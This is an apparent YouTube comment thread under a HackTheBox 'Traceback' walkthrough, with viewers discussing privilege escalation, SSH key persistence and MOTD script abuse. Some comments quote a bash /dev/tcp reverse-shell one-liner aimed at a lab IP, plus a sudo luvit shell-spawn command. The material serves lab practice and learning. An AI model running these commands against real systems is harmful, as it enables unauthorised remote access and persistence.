31:00 " oh we're greping for chron, that expl...doesn't explain it " lolol I love these videos it shows exactly how the process goes and I can't get enough .
Hey IppSec, thank you for the informative videos. It was my first ever rooted live box on HTB and after watching your video I have realised how valuable the experience is. Thank you.
Was looking forward to this because for some reason I had such a hard time getting a reverse shell back from editing the MOTD, eventually had to just settle for echoing the root flag. I'm not exactly sure why but maybe it's because I didn't do "bash -i "" and just instead did bash reverse shell by itself. Fun box and thanks for the video!
Also had some trouble with that. What I ended up doing was writing my ssh key to root's authorized_keys and SSHing in. I only thought of doing so in my second time around, when I was preparing for my writeup, though :D
@@GamerMeiogordo Ah that makes sense, I had used the smevk.php file in order to drop authorized key but for the lower user, should've attempted that for root. Thanks for the tip!
/dec/tcp/ is a weird bash thing, sometimes webservers will use less featured shells like sh/ash/etc to launch the process. So having bash -c means to use bash to execute the next command (makes sure you have /dev/tcp). The -i just means interactive and is needed for the revshell.
Maybe I missed something but your statement: "The box has been hacked and people have hired you to do some sort of incident response...". Where on HTB do you get this theme info?
Why does ippsec go from looking at /var/backups/.update... to looking at cron related things? a quick google of .update-motd.d doesnt give any cron related hints either. is this just system knowledge stuff or did ippsec have an idea of looking at cron after seeing this content?
When I tried a reverse shell on the MOTD scripts they weren't working. Was this due to the bash -c 'bash -i' trick? Alternatively I just used the script to write to /root/.ssh/authorized_keys, so that worked as well
I was thinking abt this. It seems like since the Lua script runs as root, you can just write to the root ssh key and skip the user flag. Not sure tho @ippsec
Pretty sure he could've just read /etc/shadow and /etc/passwd, throwing them at John, or even more direct just read the root.txt (since he can sudo without a password, if he writes a script that reads those files I think it's possible to simply read all those files with escalated privileges)
The user does not have root priv, so could not have done that. I could have just done like os.execute() for a revshell but ssh keys more stable and also a persistence
You can also just check gtfo bins for lua related stuff. Some good alternatives. Like @ippsec said though, ssh key is going to be the most stable provided that it's open and accepting no-pass logins.
@@ippsec my bad, seems like my understanding of having (NOPASSWD) on a binary in sudoers is bad, aka it doesn't mean you can get root privileges via executing said binary unless the user is root, but you can only gain privileges of that user
Would scripts like LinPEASS/PowerUp ever be used in a real life situation? They always seemed pretty noisy to me, but I was interested to know if they're useful
lol I doubt it, relying on views is a bad business model for technical/long-format creators, start using a subscription service like subscribe star and/or crypto-wallets in all the common currencies for donations. Many channels do this as it promotes quality over quantity and you won't be beholden to anyone/ creating clickbait filler content.
Hi, thank you for the video, I have a question, why did you use : bash -c ‘bash -i >& /dev/tcp/10.10.10.10/3333 9>&1 ' and not directly bash -i >& /dev/tcp/10.10.10.10/3333 9>&1
IppSec, by any chance you have a lab or walkthrough of recovering data on true crypt hidden volumes, I been working lately trying to recover a backup, perhaps I'm your experience you've run through this can give me a nudge. Thanks
Hello, beginner here and I could use some help. After I run nmap -sC -sV -oA nmap/traceback 10.10.10.181 and get they out put I try to follow along and use the cd /opt/SecLists/ and cd Discovery/ commands but all I get back is " The specified path does not exist" messages. I don't really see what I could have done wrong since I was following the vid, any advice would be greatly appreciated!
These files are from github and do not come with your standard OS installation (I'm assuming you're using Kali linux instead of Parrot). Ippsec has already downloaded them to the machine in this video. If you search github for "SecLists" (github.com/danielmiessler/SecLists) you can download these to your machine using git clone and continue from there
Btw you can also host a SimpleHTTPServer with python -m SimpleHTTPServer instead of running an apache server to push files to the victim's target. i find the python method way simpler and faster.
this box/browser-based-machine is available on www.hackthebox.eu . Basically it is a website which provides you with many machines on which you can perform your hacking skills or practice for the OSCP certification the machine which are given in this certification are likely to be like this . If you are a beginner and want to learn this then i would recommend you to first visit tryhackme.com it is the best place to start there you will be guided which machines you should complete first and it also contains various walk through which can guide you better . When you gain a little confidence that you know what you have to do then you can move on to this site . Make sure to keep and maintain notes on every machine you work on it will help you in future if you prepare for OSCP I hope this clears your doubt
I had a lot of fun with this box. Neat idea appending to authorized_keys; I ended up using GTFOBins to spawn a shell as sysadmin. gtfobins.github.io/gtfobins/lua/#shell
31:00 " oh we're greping for chron, that expl...doesn't explain it " lolol I love these videos it shows exactly how the process goes and I can't get enough .
Love green linux boxes, this type is the only where beginners can fun
❤️
More like a medium I would say
Heh even experienced users find the fun only in easy boxes 😅
Hey IppSec, thank you for the informative videos. It was my first ever rooted live box on HTB and after watching your video I have realised how valuable the experience is. Thank you.
Was looking forward to this because for some reason I had such a hard time getting a reverse shell back from editing the MOTD, eventually had to just settle for echoing the root flag. I'm not exactly sure why but maybe it's because I didn't do "bash -i "" and just instead did bash reverse shell by itself. Fun box and thanks for the video!
Also had some trouble with that. What I ended up doing was writing my ssh key to root's authorized_keys and SSHing in. I only thought of doing so in my second time around, when I was preparing for my writeup, though :D
@@GamerMeiogordo Ah that makes sense, I had used the smevk.php file in order to drop authorized key but for the lower user, should've attempted that for root. Thanks for the tip!
So much to learn from this video. Thank you IppSec!
Learned a lot with SSH keys and lua scripting :)
Thank you IppSec you always help me learn something new.
Thank you for taking the time to do the walk through!
great walkthrough! thanks for explaining your thinking process.
Hey Ippsec. Nice to be second commenting on your video. Again great work as usual.
Always legendary!! 🔥❤️
You know the feeling when you watch IppSec videos just because you are sad?
It's weird.
However, it just happened to me.
Hope you're doing okay, my friend💜
Excellent walk-through !
FYI: Lua is also used to handle the game logic in a lot of computer games.
LUA is basically the entire Base of every World of Warcraft Addon and every Garrys Mod hack :D
Hey ippsec, i was wondering is there a chance we can get your parrot system mount to download? Great content as always, much love.
github.com/theGuildHall/pwnbox Here is a guide to set it up
Here I found this ! Its not his but similar to HTB's pwnbox github.com/theGuildHall/pwnbox
@@duckie4670 i tried :'D
@@evildead7845 thanks buddy
❤❤
what do the -c and -i commands do at 6:19 ?
/dec/tcp/ is a weird bash thing, sometimes webservers will use less featured shells like sh/ash/etc to launch the process. So having bash -c means to use bash to execute the next command (makes sure you have /dev/tcp). The -i just means interactive and is needed for the revshell.
@@ippsec I see .thanks
-c means command. -i means interactive . that command tells bash to execute an interactive bash shell.
Maybe I missed something but your statement: "The box has been hacked and people have hired you to do some sort of incident response...". Where on HTB do you get this theme info?
Just an assumption based upon the webshell being there. Combine that with the name trace, it seems like that’s the scenario it’s going for.
Why does ippsec go from looking at /var/backups/.update... to looking at cron related things? a quick google of .update-motd.d doesnt give any cron related hints either. is this just system knowledge stuff or did ippsec have an idea of looking at cron after seeing this content?
@22:00 learned a new command: stat! Thanks @ippsec
Damn, you are good, new sub!
When I tried a reverse shell on the MOTD scripts they weren't working. Was this due to the bash -c 'bash -i' trick? Alternatively I just used the script to write to /root/.ssh/authorized_keys, so that worked as well
I was thinking abt this. It seems like since the Lua script runs as root, you can just write to the root ssh key and skip the user flag. Not sure tho @ippsec
i love your videos
what other options are there for the .lua script you could write? could you just write a reverse shell in .lua ?
Pretty sure he could've just read /etc/shadow and /etc/passwd, throwing them at John, or even more direct just read the root.txt (since he can sudo without a password, if he writes a script that reads those files I think it's possible to simply read all those files with escalated privileges)
@@ralesarcevic or I spose he could've wrote to /etc/passwd ?
The user does not have root priv, so could not have done that. I could have just done like os.execute() for a revshell but ssh keys more stable and also a persistence
You can also just check gtfo bins for lua related stuff. Some good alternatives. Like @ippsec said though, ssh key is going to be the most stable provided that it's open and accepting no-pass logins.
@@ippsec my bad, seems like my understanding of having (NOPASSWD) on a binary in sudoers is bad, aka it doesn't mean you can get root privileges via executing said binary unless the user is root, but you can only gain privileges of that user
great tutorial ....btw in order to privesc u could have used
sudo -u sysadmin /home/sysadmin/luvit -e 'os.exexcute("/bin/sh")'
nice zsh theme
-sC -sV can be combined with -sCV
thx
Would scripts like LinPEASS/PowerUp ever be used in a real life situation? They always seemed pretty noisy to me, but I was interested to know if they're useful
Isn't your channel monetized? Should I be investing time on youtube for walkthrough videos?
lol I doubt it, relying on views is a bad business model for technical/long-format creators, start using a subscription service like subscribe star and/or crypto-wallets in all the common currencies for donations. Many channels do this as it promotes quality over quantity and you won't be beholden to anyone/ creating clickbait filler content.
really confusing playing htb, how do u guys know when to google, nmap, view source, and choosing fuzz wordlist?
experience, and intuition
Hi, thank you for the video, I have a question, why did you use :
bash -c ‘bash -i >& /dev/tcp/10.10.10.10/3333 9>&1
'
and not directly
bash -i >& /dev/tcp/10.10.10.10/3333 9>&1
In some cases that will not work.
IppSec, by any chance you have a lab or walkthrough of recovering data on true crypt hidden volumes, I been working lately trying to recover a backup, perhaps I'm your experience you've run through this can give me a nudge. Thanks
What is the source of your SecList? Is it available on GitHub?
apt install seclists
Source: github.com/danielmiessler/SecLists
Hello, beginner here and I could use some help. After I run nmap -sC -sV -oA nmap/traceback 10.10.10.181 and get they out put I try to follow along and use the cd /opt/SecLists/ and cd Discovery/ commands but all I get back is " The specified path does not exist" messages. I don't really see what I could have done wrong since I was following the vid, any advice would be greatly appreciated!
These files are from github and do not come with your standard OS installation (I'm assuming you're using Kali linux instead of Parrot). Ippsec has already downloaded them to the machine in this video. If you search github for "SecLists" (github.com/danielmiessler/SecLists) you can download these to your machine using git clone and continue from there
Is this retired machine ?
It seems to me, that you did this vid in a hurry :)
Would like to know ur tmux configuration
Very nice❤💗.I have to send more money. So good, I have to.
Creative ?
Btw you can also host a SimpleHTTPServer with python -m SimpleHTTPServer instead of running an apache server to push files to the victim's target. i find the python method way simpler and faster.
could anyone explain this in breif .. like what is this
whats this called
how you can learn
thanks
this box/browser-based-machine is available on www.hackthebox.eu . Basically it is a website which provides you with many machines on which you can perform your hacking skills or practice for the OSCP certification the machine which are given in this certification are likely to be like this .
If you are a beginner and want to learn this then i would recommend you to first visit tryhackme.com it is the best place to start there you will be guided which machines you should complete first and it also contains various walk through which can guide you better . When you gain a little confidence that you know what you have to do then you can move on to this site .
Make sure to keep and maintain notes on every machine you work on it will help you in future if you prepare for OSCP
I hope this clears your doubt
I had a lot of fun with this box. Neat idea appending to authorized_keys; I ended up using GTFOBins to spawn a shell as sysadmin.
gtfobins.github.io/gtfobins/lua/#shell
just btw: wget -O -
Lua is pronounced loo-er
He says "loo-er" at 14:18. You actually think he doesn't know how to pronounce it?